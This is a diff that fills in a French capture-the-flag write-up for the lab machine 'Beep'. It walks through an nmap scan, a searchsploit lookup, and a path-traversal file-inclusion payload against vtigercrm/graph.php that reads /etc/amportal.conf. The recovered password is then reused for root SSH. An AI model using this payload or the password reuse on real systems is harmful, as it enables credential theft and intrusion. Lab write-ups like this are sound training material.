--- a/[easy] Beep.docx
+++ b/[easy] Beep.docx
@@ -78,6 +78,9 @@
       <w:r>
         <w:t>Recherche et exploitation de CVE</w:t>
       </w:r>
+      <w:r>
+        <w:t>/exploit</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -117,9 +120,114 @@
         <w:t>Enumération</w:t>
       </w:r>
     </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Bla</w:t>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>Nous commençons avec une énumération de ports et services </w:t>
+      </w:r>
+      <w:r>
+        <w:t>avec nmap :</w:t>
+      </w:r>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="Grilledutableau"/>
+        <w:tblW w:w="0" w:type="auto"/>
+        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="9062"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="9062" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t>$ nmap -T4 -A 10.10.10.7</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>[nmap]</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Beaucoup de ports sont ouverts, pour l’instant nous allons nous concentrer sur le</w:t>
+      </w:r>
+      <w:r>
+        <w:t>s</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> port</w:t>
+      </w:r>
+      <w:r>
+        <w:t>s</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> 80</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> et 443</w:t>
+      </w:r>
+      <w:r>
+        <w:t>, le service associé est un apache httpd en version 2.2.3.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>Avant de faire l’énumération de dossiers et fichiers, nous faisons un rapide tour sur le site :</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Avec ces informations, nous pouvons rechercher un exploit avec searchsploit :</w:t>
+      </w:r>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="Grilledutableau"/>
+        <w:tblW w:w="0" w:type="auto"/>
+        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="9062"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="9062" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t>$ searchsploit -w Elastix</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>[searchsploit]</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">L’exploit 37637 permet une LFI, ce qui nous permettrait de </w:t>
+      </w:r>
+      <w:r>
+        <w:t>lire/d’exploiter des fichiers du serveur.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -161,11 +269,222 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:r>
-        <w:t>Bla</w:t>
-      </w:r>
-    </w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="ProximaNova-Regular" w:hAnsi="ProximaNova-Regular" w:cs="ProximaNova-Regular"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Nous allons donc sur le lien suivant pour savoir comment exécuter notre LFI :</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId5" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Lienhypertexte"/>
+            <w:rFonts w:ascii="ProximaNova-Regular" w:hAnsi="ProximaNova-Regular" w:cs="ProximaNova-Regular"/>
+          </w:rPr>
+          <w:t>https://www.exploit-db.com/exploits/37637/</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="ProximaNova-Regular" w:hAnsi="ProximaNova-Regular" w:cs="ProximaNova-Regular"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="ProximaNova-Regular" w:hAnsi="ProximaNova-Regular" w:cs="ProximaNova-Regular"/>
+        </w:rPr>
+        <w:t>D’après l’explication, il suffit d</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="ProximaNova-Regular" w:hAnsi="ProximaNova-Regular" w:cs="ProximaNova-Regular"/>
+        </w:rPr>
+        <w:t>’</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="ProximaNova-Regular" w:hAnsi="ProximaNova-Regular" w:cs="ProximaNova-Regular"/>
+        </w:rPr>
+        <w:t>exécuter</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="ProximaNova-Regular" w:hAnsi="ProximaNova-Regular" w:cs="ProximaNova-Regular"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> la commande suivante pour lister les utilisateurs :</w:t>
+      </w:r>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="Grilledutableau"/>
+        <w:tblW w:w="0" w:type="auto"/>
+        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="9062"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="9062" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:tabs>
+                <w:tab w:val="left" w:pos="916"/>
+                <w:tab w:val="left" w:pos="1832"/>
+                <w:tab w:val="left" w:pos="2748"/>
+                <w:tab w:val="left" w:pos="3664"/>
+                <w:tab w:val="left" w:pos="4580"/>
+                <w:tab w:val="left" w:pos="5496"/>
+                <w:tab w:val="left" w:pos="6412"/>
+                <w:tab w:val="left" w:pos="7328"/>
+                <w:tab w:val="left" w:pos="8244"/>
+                <w:tab w:val="left" w:pos="9160"/>
+                <w:tab w:val="left" w:pos="10076"/>
+                <w:tab w:val="left" w:pos="10992"/>
+                <w:tab w:val="left" w:pos="11908"/>
+                <w:tab w:val="left" w:pos="12824"/>
+                <w:tab w:val="left" w:pos="13740"/>
+                <w:tab w:val="left" w:pos="14656"/>
+              </w:tabs>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+                <w:lang w:eastAsia="fr-FR"/>
+              </w:rPr>
+              <w:t>/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&amp;module=Accounts&amp;action</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
     <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>En complétant avec nos informations, cela donne le payload suivant :</w:t>
+      </w:r>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="Grilledutableau"/>
+        <w:tblW w:w="0" w:type="auto"/>
+        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="9062"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="9062" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t>$ curl https://10.10.10.7/</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+                <w:lang w:eastAsia="fr-FR"/>
+              </w:rPr>
+              <w:t>vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&amp;module=Accounts&amp;action</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>[curl]</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Nous avons donc un identifiant et mot de passe, nous pouvons </w:t>
+      </w:r>
+      <w:r>
+        <w:t>essayer</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> d’utiliser le même mot de passe pour les autres utilisateurs en ssh :</w:t>
+      </w:r>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="Grilledutableau"/>
+        <w:tblW w:w="0" w:type="auto"/>
+        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="9062"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="9062" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t>$ ssh root@10.10.10.7</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>[ssh]</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Ici nous avons du password re-use, ce qui nous permet d’être root sur la machine, nous finissons par aller chercher les flags pour finir la box :</w:t>
+      </w:r>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="Grilledutableau"/>
+        <w:tblW w:w="0" w:type="auto"/>
+        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="9062"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="9062" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t>$ cat /home/fanis/user.txt</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>$ cat /root/root.txt</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>[flag]</w:t>
+      </w:r>
+    </w:p>
     <w:sectPr>
       <w:pgSz w:w="11906" w:h="16838"/>
       <w:pgMar w:top="1417" w:right="1417" w:bottom="1417" w:left="1417" w:header="708" w:footer="708" w:gutter="0"/>
@@ -733,6 +1052,111 @@
       <w:contextualSpacing/>
     </w:pPr>
   </w:style>
+  <w:style w:type="table" w:styleId="Grilledutableau">
+    <w:name w:val="Table Grid"/>
+    <w:basedOn w:val="TableauNormal"/>
+    <w:uiPriority w:val="39"/>
+    <w:rsid w:val="004A64D9"/>
+    <w:pPr>
+      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+    </w:pPr>
+    <w:tblPr>
+      <w:tblBorders>
+        <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+        <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+        <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+        <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+        <w:insideH w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+        <w:insideV w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+      </w:tblBorders>
+    </w:tblPr>
+  </w:style>
+  <w:style w:type="character" w:styleId="Lienhypertexte">
+    <w:name w:val="Hyperlink"/>
+    <w:basedOn w:val="Policepardfaut"/>
+    <w:uiPriority w:val="99"/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="00A27EF6"/>
+    <w:rPr>
+      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
+      <w:u w:val="single"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:styleId="Mentionnonrsolue">
+    <w:name w:val="Unresolved Mention"/>
+    <w:basedOn w:val="Policepardfaut"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="00A27EF6"/>
+    <w:rPr>
+      <w:color w:val="605E5C"/>
+      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="PrformatHTML">
+    <w:name w:val="HTML Preformatted"/>
+    <w:basedOn w:val="Normal"/>
+    <w:link w:val="PrformatHTMLCar"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="00665772"/>
+    <w:pPr>
+      <w:tabs>
+        <w:tab w:val="left" w:pos="916"/>
+        <w:tab w:val="left" w:pos="1832"/>
+        <w:tab w:val="left" w:pos="2748"/>
+        <w:tab w:val="left" w:pos="3664"/>
+        <w:tab w:val="left" w:pos="4580"/>
+        <w:tab w:val="left" w:pos="5496"/>
+        <w:tab w:val="left" w:pos="6412"/>
+        <w:tab w:val="left" w:pos="7328"/>
+        <w:tab w:val="left" w:pos="8244"/>
+        <w:tab w:val="left" w:pos="9160"/>
+        <w:tab w:val="left" w:pos="10076"/>
+        <w:tab w:val="left" w:pos="10992"/>
+        <w:tab w:val="left" w:pos="11908"/>
+        <w:tab w:val="left" w:pos="12824"/>
+        <w:tab w:val="left" w:pos="13740"/>
+        <w:tab w:val="left" w:pos="14656"/>
+      </w:tabs>
+      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+    </w:pPr>
+    <w:rPr>
+      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+      <w:sz w:val="20"/>
+      <w:szCs w:val="20"/>
+      <w:lang w:eastAsia="fr-FR"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="PrformatHTMLCar">
+    <w:name w:val="Préformaté HTML Car"/>
+    <w:basedOn w:val="Policepardfaut"/>
+    <w:link w:val="PrformatHTML"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:rsid w:val="00665772"/>
+    <w:rPr>
+      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+      <w:sz w:val="20"/>
+      <w:szCs w:val="20"/>
+      <w:lang w:eastAsia="fr-FR"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:styleId="CodeHTML">
+    <w:name w:val="HTML Code"/>
+    <w:basedOn w:val="Policepardfaut"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="00665772"/>
+    <w:rPr>
+      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+      <w:sz w:val="20"/>
+      <w:szCs w:val="20"/>
+    </w:rPr>
+  </w:style>
 </w:styles>
 </file>
 
